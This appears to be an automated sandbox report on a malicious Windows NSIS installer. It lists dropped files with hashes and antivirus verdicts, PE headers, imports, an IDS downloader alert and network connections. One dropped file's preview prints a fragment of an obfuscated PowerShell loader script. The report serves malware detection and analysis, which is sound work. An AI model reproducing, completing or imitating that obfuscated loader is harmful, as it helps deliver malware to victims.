SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3fbgsc4.wim.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5zjanck.2qu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.6614996787412575
Encrypted:	false
SSDEEP:	48:qYGZ0Gtq/oaPybCQ1hsIqXA1AfsgsfbLwGXwaEvRugYy/ImBmrm:wDAoyXAykgEUGAaGRuRm
MD5:	245AC30568C8703531FC4E64B321BE16
SHA1:	BADD01A31FC2B8CC050A1DC3489FC8F620C450F7
SHA-256:	B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
SHA-512:	9A81F2DE2CC41F6E35498B04B6327ADCFF268523F7B6A9EA9D5CFA1B2CF0425E59A121C99F0A0251C3380886CC058E88DE8A12B17E049D5FD5D7EEB0C956F083
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.............................. ......0#......Rich............................PE..L.....uY...........!......................... ...............................P......................................."..h...l ..<............................@....................................................... ..l............................text...g........................... ..`.rdata..(.... ......................@..@.data...<....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.286321681873388
Encrypted:	false
SSDEEP:	48:qK64n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSC15gaoFU:5P4ZxKQruHkJwvcVyV4FU
MD5:	200E4D67E7A08D4C92F05E31442095FE
SHA1:	1D0492FDFB7C0C8799AEA7982DA8B4EFEDE7581B
SHA-256:	01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
SHA-512:	620AB7A94E4EE965C159CC1A5F2ADC2CC6616CFB738EA191EAB404B249D21DD19134A314A21315F4EE2C0A75FD5062D1BF353BB75B877A61171F27F4A87CF995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....uY...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\Loggie.Nav

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	data
Category:	dropped
Size (bytes):	335979
Entropy (8bit):	7.680216708925065
Encrypted:	false
SSDEEP:	6144:pFnU6YwkPOdnMEuUukgKRSTZT/r8HBMXP0wdzSJxQ26r6flmR:XnU6kPWnnufHTleesAGPQ26GI
MD5:	22AB1C8AF9B0182D04C2132E8DA05E20
SHA1:	7F8CD8FADB2C237F9BCC49AF0069F393BF4EC00E
SHA-256:	FF30CB42A7D88083FF271CCA11B91EA49A068290574FA2A747FAAD2983C67B03
SHA-512:	A93FAA646B40E03F93DC949E929F1EFF379297EF955707F54E497795CA761F7F6829EB4F6E9FE5957EE45E7751AD50D7A3B484F4913B6DF6572CAD24905EB4F9
Malicious:	false
Preview:	.88888..!..........,......u...D..-..?.33........##.................K...GG.....{....U...............}}}.........``...........................llll.......-......................i....,,.....(......??............ffff.DD...................=====.ii...q......$..\....o...BBB........C.......D....&....?.?..............O.....qq..***....................n.O...................X...........R..xxx.a.x..........ww.....>>.......L....................................^^^.__.c..<.5.............x......??.;............................z.'''.........................\|........%.....u..............0..<<.......\..................@.............4........G...'............T....................gg......pppppp............ll._.......O......../........................N..............^....^.............z...........F................{{........a.....d...i.rrr........QQQQQQ....a........(......AAA....X..........#.........E.9.@@.....sss..................#......FF.........&...........h...............DDD.......%%.......u......ggg......

C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	ASCII text, with very long lines (3221), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53817
Entropy (8bit):	5.3212060511904475
Encrypted:	false
SSDEEP:	768:c3EX6pD/iqZmFsz70lMj3A/FS5oT1IQVzKqVUdSFGwRpuAjlp1zC5/wnR8wuRS:bKpmBF47EWA1TSiUdFGbzDSwgS
MD5:	BCA669516C5BD74FE622F79DF2A9262B
SHA1:	DEE0B74C6D95FFB819D47600D9943D8A9836E0EF
SHA-256:	FD76BAEB84CA420FA8F967D977808F09F1D73E758B8E6A134C605D6305B9B783
SHA-512:	4F7A9E77B711BC39E451D0756DF63A082F4A048DA545F1E781636AEC0281D54191F524BB74A8534EF4A7737EEB1BE0477F01C9EBC2543D5FD0CB3BE7981EEBD1
Malicious:	true
Preview:	$Predisputantntilogs=$Predisputantrbejdsfrie;..<#Philomusical Asphyxiated Surfende #>..<#Subvermiform Trigges Godteposes Conciliator #>..<#Rumdeleren Lykkeriddere Stenotic Urteagtig Endetarmene Eksporthavne #>..<#Preequity Plakatering Jernhaardt Jenskaders myology Bihulen Complacent #>..<#Jagtlejes Brevkontrol Periodology #>..<#Staalhjelm Vanaheim Haematin Kurvenes Cacodaemon Contraceptive Pasform #>...$Opdagerne = @'.Mormo.Woo b$ Ca,mSRedninPhenoe aryndHydrok.emulkCysteespdert No.e=Inval$ S ngRUkraiuZimbanS rubdR impbArbejuUdbyteVagins Yo ot liniEna.cls rinnUnived adufCranirrdkaaiForldeIdi.tn Hoved SubaeA.pro;Dispe.Re.ogf Lo.tu totanStrb.cfemort Sjlei alloBe rinNegat DirigDDistraPengegSskens ti drSemioeStarggErklrnGodkeeHvirvnBlack2S,jki3I fal8In am Dis o( Vk,e$HelhePB,avirDrjdeeKugledkamufiMero sAn lipTerseuChemitAnt raUdestnCounttDisk ,Flint$Re,ulGPrinciAcrinp HarbsCun.iounbulrDi innLandsaPr lom DewaeDistrnDadu,tfilip)V,gra Mode{Felic.Vrest. Fot,$UnskiCdagplrDaa eiUnderm Lin.pA.

C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	525906
Entropy (8bit):	7.6577197197827775
Encrypted:	false
SSDEEP:	12288:SpC1gNvzNkSObzXhVywoTWIuZ1n7JExZ0x1Odt3xD:eC1mxSzXYWIy1nm4MJ
MD5:	8A678142D7D4BD32F67A17757CC896A0
SHA1:	FA2CA787BBD87D95FBA79851E1ABA0000B9CFD8C
SHA-256:	3468B04EEA8016136FE8DC5B259C22CF2088B3FAA4B41F52F54ADE1F0CB5078F
SHA-512:	8A18BFED405CD281CA88C77E5B1282AA78374BD925DA48ED20BBAE944F15A7068EA84DF296A6F89AF71E12726BCED059DBE3BEEEDCCFC8D0EE7544B17169F397
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L...#.uY.................`...........1.......p....@.......................................@.................................(t.......0...W...........................................................................p...............................text....^.......`.................. ..`.rdata..H....p.......d..............@..@.data................x..............@....ndata.......@...........................rsrc....W...0...X...\|..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\unshabbily\dicyclopentadienyliron.skr

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	data
Category:	dropped
Size (bytes):	134563
Entropy (8bit):	1.2420304589895552
Encrypted:	false
SSDEEP:	768:JTXI/LYa4cD2ujQzIsqIoMEJ8owrALEXMFrDwh0aHlC++KDTvfO/Ky:EnVS+r9brkwN/
MD5:	E6066CC79780E021C55CDC3EF8FC82CC
SHA1:	FADDF02F672BEA8C3A766FB42F1FDC365934ED50
SHA-256:	ED56062F4EA903C040602E4F50BB0F88A5E5DAC8F9F50A608D0495347C1003B8
SHA-512:	1F856CE5664BA5BC3914ACE73BDF0F0EBD419A5162890F9E7F66A9878DA9ACDDE9E24A42DDCE4ADAC7014F41F4C54977D9754DC867A9570B6A7BCAB757FC53F7
Malicious:	false
Preview:	...................................~.................j.....................................................q-....................................................................M................n..O%....H............................4..=......................z..................j.............................................'..............T.M..............!.................................................................................x.....................{..............R..............................................&..........h..............0...............................................................D...................................................................................................................................(..........................................................................E...........`.....=......................n.............................!...g................................#.........................................................................

C:\Users\user\AppData\Local\unshabbily\fjernkontrollers.hid

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	data
Category:	dropped
Size (bytes):	347357
Entropy (8bit):	1.2510537828861161
Encrypted:	false
SSDEEP:	768:7wNmQThgiCB7GJHZUFVJPaSenNvSIpJjRuermO9c3NMRzgJrawa1+VWzoIk33SnI:Agcs7GTR7EvgE
MD5:	10C53FA2ADD5E04A7C257241470F8B30
SHA1:	F280F7414C749DA2A84EAC4DF1AD18B623325CF8
SHA-256:	E27733521BB45F4719C1FFFB5D0D9262E8BAA510C52E7EC880612464E5889685
SHA-512:	CF23EA9FB2316C67A1AAA7DCEFD48728F9DBC17E2413867EBFEB443F2EE7CF0BCFCF00F2FAF094A56779FEAE27D14E7408D629E0DF4EF7A8D2CF4FAFA1EBF2D0
Malicious:	false
Preview:	.........[......*....................................................`..........x.......................................#......A..........................................t....................&.....................y...............................................................................................................................h...............K.........................................................................s......................S.........................n.....`...................................................................................J..a.............;.........................x.....................e.........6.....................?.......................................................U.....c.......................A...........................................................\|..............................................=............................L...........p..f.......]..................E................................................................v...

C:\Users\user\AppData\Local\unshabbily\irresolubleness.hje

Download File

Process:	C:\Users\user\Desktop\beNxougDFV.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 164
Category:	dropped
Size (bytes):	4242
Entropy (8bit):	1.1689000520156396
Encrypted:	false
SSDEEP:	24:3X9EQjC0f2xlR8XA8f+6mqZVN//sTqYiegGDXMTTO1zlvyQ:nbpexne/+UfNXsNiSCTOPvh
MD5:	7F09DBB1E7A421C1C43B98C594A1F1EE
SHA1:	5E541763EFD79D7005668B908BE438412E042CBD
SHA-256:	20F7314F0A64579C20FFBAC8DE67F9D36FD4824F5C64DC01D89F5FF4908BCDC5
SHA-512:	B901933CD173EDC42828FCC6CCA5B4A4BC29FD0F0ADD0AE08BE56BBF1D24781C542C8CE99142069287C976F6E8059D5ACD95FEA8D54427D9B02F74765352AAF5
Malicious:	false
Preview:	.......................%............................................................U............W......Z.............;.................Q...........................s.......................................E.............................................z...............................M..........P...................................<........u.............................w................c.........................................I...................................k........?................................}.................$..................'..=2.......G..h...?.....................................................................\|................................................ ............hj..............................................-............+...................................R....h.........................._.!....R........................".................................Q&<...............................J........N.......................................d..........................5

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.6577197197827775
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	beNxougDFV.exe
File size:	525'906 bytes
MD5:	8a678142d7d4bd32f67a17757cc896a0
SHA1:	fa2ca787bbd87d95fba79851e1aba0000b9cfd8c
SHA256:	3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f
SHA512:	8a18bfed405cd281ca88c77e5b1282aa78374bd925da48ed20bbae944f15a7068ea84df296a6f89af71e12726bced059dbe3beeedccfc8d0ee7544b17169f397
SSDEEP:	12288:SpC1gNvzNkSObzXhVywoTWIuZ1n7JExZ0x1Odt3xD:eC1mxSzXYWIy1nm4MJ
TLSH:	43B41262F79490E2C83A06B176A3CC312961792E47B162BF279437EE1466373490FE5F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...#.uY.................`.........

File Icon


Icon Hash:	246445471b4f0f1f

Static PE Info

General

Entrypoint:	0x4031bb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759523 [Mon Jul 24 06:35:15 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007F2FCCAF13C3h
push ebx
call 00007F2FCCAF447Ah
cmp eax, ebx
je 00007F2FCCAF13B9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F2FCCAF43F6h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F2FCCAF139Dh
push 0000000Ah
call 00007F2FCCAF444Eh
push 00000008h
call 00007F2FCCAF4447h
push 00000006h
mov dword ptr [00423704h], eax
call 00007F2FCCAF443Bh
cmp eax, ebx
je 00007F2FCCAF13C1h
push 0000001Eh
call eax
test eax, eax
je 00007F2FCCAF13B9h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33000	0x15788	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ed2	0x6000	9112619c91f32f6f8e4096e108712ebe	False	0.6629638671875	data	6.442176588686321	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1248	0x1400	1c9a524313c13059919ecf8195d205be	False	0.4275390625	data	5.007650149182371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	458aeaedc3eabb1f26ec1bbd666017ae	False	0.6396484375	data	5.13585559284969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33000	0x15788	0x15800	40497017b2a1d5e01ad2b917ac12d1eb	False	0.2589821039244186	data	4.486367209516884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x332c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.21990713356204897
RT_ICON	0x43af0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.35072614107883815
RT_ICON	0x46098	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.39094746716697937
RT_ICON	0x47140	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.48811475409836064
RT_ICON	0x47ac8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5523049645390071
RT_DIALOG	0x47f30	0x100	data	English	United States	0.5234375
RT_DIALOG	0x48030	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x48150	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x48218	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x48278	0x4c	data	English	United States	0.8157894736842105
RT_VERSION	0x482c8	0x180	data	English	United States	0.5859375
RT_MANIFEST	0x48448	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T16:42:16.487474+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49893	172.217.19.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 16:42:13.743913889 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:13.743974924 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:13.744086981 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:13.819861889 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:13.819906950 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:15.580040932 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:15.580146074 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:15.580926895 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:15.580996037 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:15.650480986 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:15.650521994 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:15.650881052 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:15.650938988 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:15.653364897 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:15.695347071 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:16.487474918 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:16.487632036 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:16.487663031 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:16.487715960 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:16.487793922 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:16.487835884 CET	443	49893	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:16.487884998 CET	49893	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:16.646388054 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:16.646445036 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:16.646509886 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:16.646851063 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:16.646863937 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:18.401163101 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:18.401262999 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:18.410043001 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:18.410057068 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:18.410424948 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:18.410480976 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:18.411174059 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:18.451333046 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.356295109 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.356383085 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.356411934 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.356461048 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.357038021 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.357101917 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.357412100 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.357455015 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.357484102 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.357501030 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.362224102 CET	49902	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:19.362241983 CET	443	49902	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:19.480753899 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:19.480797052 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:19.480923891 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:19.481185913 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:19.481199026 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:21.271667957 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:21.271790981 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:21.272459030 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:21.272532940 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:21.274442911 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:21.274456024 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:21.274709940 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:21.274769068 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:21.275171995 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:21.319329977 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:22.214061022 CET	443	49908	172.217.19.174	192.168.2.10
